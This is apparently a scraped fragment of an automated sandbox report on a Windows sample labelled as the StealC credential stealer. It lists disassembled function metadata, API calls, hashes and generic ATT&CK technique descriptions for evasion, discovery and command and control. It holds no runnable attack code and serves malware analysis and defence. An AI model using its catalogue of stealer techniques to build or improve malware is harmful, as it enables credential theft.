lstrcpy.KERNEL32(00000000,?), ref: 00811866

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
Instruction ID: ae2216ad6e03fd9e43bcb854ef977ddd09cd31c66fbf0360c3ce837bbec3289f
Opcode Fuzzy Hash: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
Instruction Fuzzy Hash: 2431C5B4A01B429FCB28DF3AD588996BBE9FF48704700492DE956C3B50DB70F850CB90

Function 00421740 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421771
lstrcpy.KERNEL32(00000000,?), ref: 004217A9
lstrcpy.KERNEL32(00000000,?), ref: 004217E1
lstrcpy.KERNEL32(00000000,?), ref: 00421819

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 2fb7665d289f3db0efdc1852e22dfc26c328aeb3135bf3b3dadaf1b6e2351e1c
Instruction ID: c18d6414a2412b528fc955e16ea083020aa3798d7b09f0809961d6aed774200b
Opcode Fuzzy Hash: 2fb7665d289f3db0efdc1852e22dfc26c328aeb3135bf3b3dadaf1b6e2351e1c
Instruction Fuzzy Hash: 63212A74701B028BD724DF3AE998A17B7F5AF94700B40492EE486D3B90DB78E801CFA4

Function 00401530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401610: lstrcpy.KERNEL32(00000000), ref: 0040162D
Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 0040164F
Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 00401671
Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,00420703), ref: 00401693

lstrcpy.KERNEL32(00000000,?), ref: 00401557
lstrcpy.KERNEL32(00000000,?), ref: 00401579
lstrcpy.KERNEL32(00000000,?), ref: 0040159B
lstrcpy.KERNEL32(00000000,?), ref: 004015FF

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: be0b4612b0f016ae6962ac4f5579cb078d5eafe4d24b1f9defe8ce15595baf77
Instruction ID: 80b5f1fa651da611af66416e481b020f72ab7f98df4cd08dbf14573642dabe07
Opcode Fuzzy Hash: be0b4612b0f016ae6962ac4f5579cb078d5eafe4d24b1f9defe8ce15595baf77
Instruction Fuzzy Hash: 7931C674A01B02AFC724DF3AC988953B7E5BF48304704492EA896D7BA0DB74F811CF94

Function 0082C48D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
Instruction ID: 2beb18855967f9f4eaaddc22c5c89aa714160e87ee9f2c701f7af1bb525cb7c0
Opcode Fuzzy Hash: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
Instruction Fuzzy Hash: E9219AB0D0026A9FCB14EFA8E889AAD7BB6FF40304F145069E505EB251DB78DD80CF91

Function 00406EF2 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406F00
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
HeapAlloc.KERNEL32(00000000), ref: 00406F7B

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID:
API String ID: 1643994569-0
Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction ID: 3489786ad6ffc592b33c98b5093e94c05e4d8cefe55189094fd4c73ee0e5810c
Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction Fuzzy Hash: 8B216D706106029BDB248B21DD84BBB73E8EB40704F44487DF946DBA84FBB9E956CB64

Function 00811877 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00811894
lstrcpy.KERNEL32(00000000,?), ref: 008118B6
lstrcpy.KERNEL32(00000000,?), ref: 008118D8
lstrcpy.KERNEL32(00000000,?), ref: 008118FA

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
Instruction ID: a2bde18c158864907fd57343e50e883784266daf4c35403b8209376e8aa48d26
Opcode Fuzzy Hash: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
Instruction Fuzzy Hash: 5D11DDB4A017069BDF249F39D85C966BBEDFF447513044A2DE456C3A40EB34E891CBA0

Function 00401610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 0040162D
lstrcpy.KERNEL32(00000000,?), ref: 0040164F
lstrcpy.KERNEL32(00000000,?), ref: 00401671
lstrcpy.KERNEL32(00000000,00420703), ref: 00401693

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e293b57adc895a7825128c1074288a167b3c4ae2c20fe46356372e964975026c
Instruction ID: 77a9aadbbd26ea48150a62d0fa0b2c9b2127a70dadc2ffa25d6a6684b0360a2a
Opcode Fuzzy Hash: e293b57adc895a7825128c1074288a167b3c4ae2c20fe46356372e964975026c
Instruction Fuzzy Hash: 291112B46117029BD7149F36D94C927B7F8BF44305704093EA496E3B90DB79E801CB94

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report X4roU7TtF1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_X4roU7TtF1.exe_3536f0aed88ac12918802edacecdcde0e9dcd6_239356dd_6e9b2643-1a1b-4100-a01c-7dd8f3b46af7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E3F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F1A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F3B.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
X4roU7TtF1.exe

Function 004268F0 Relevance: 214.2, APIs: 115, Strings: 7, Instructions: 696
libraryloaderCOMMON

Function 00404A60 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemoryCOMMON

Function 004265A0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Function 00406C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Function 00421DC0 Relevance: 13.6, APIs: 9, Instructions: 129
COMMON

Function 00418DF0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 174
stringCOMMON

Function 00422910 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 93
memoryCOMMON

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00404BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Function 00401030 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Function 0041F070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Function 004010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Function 00422CA0 Relevance: 4.5, APIs: 3, Instructions: 44
memoryCOMMON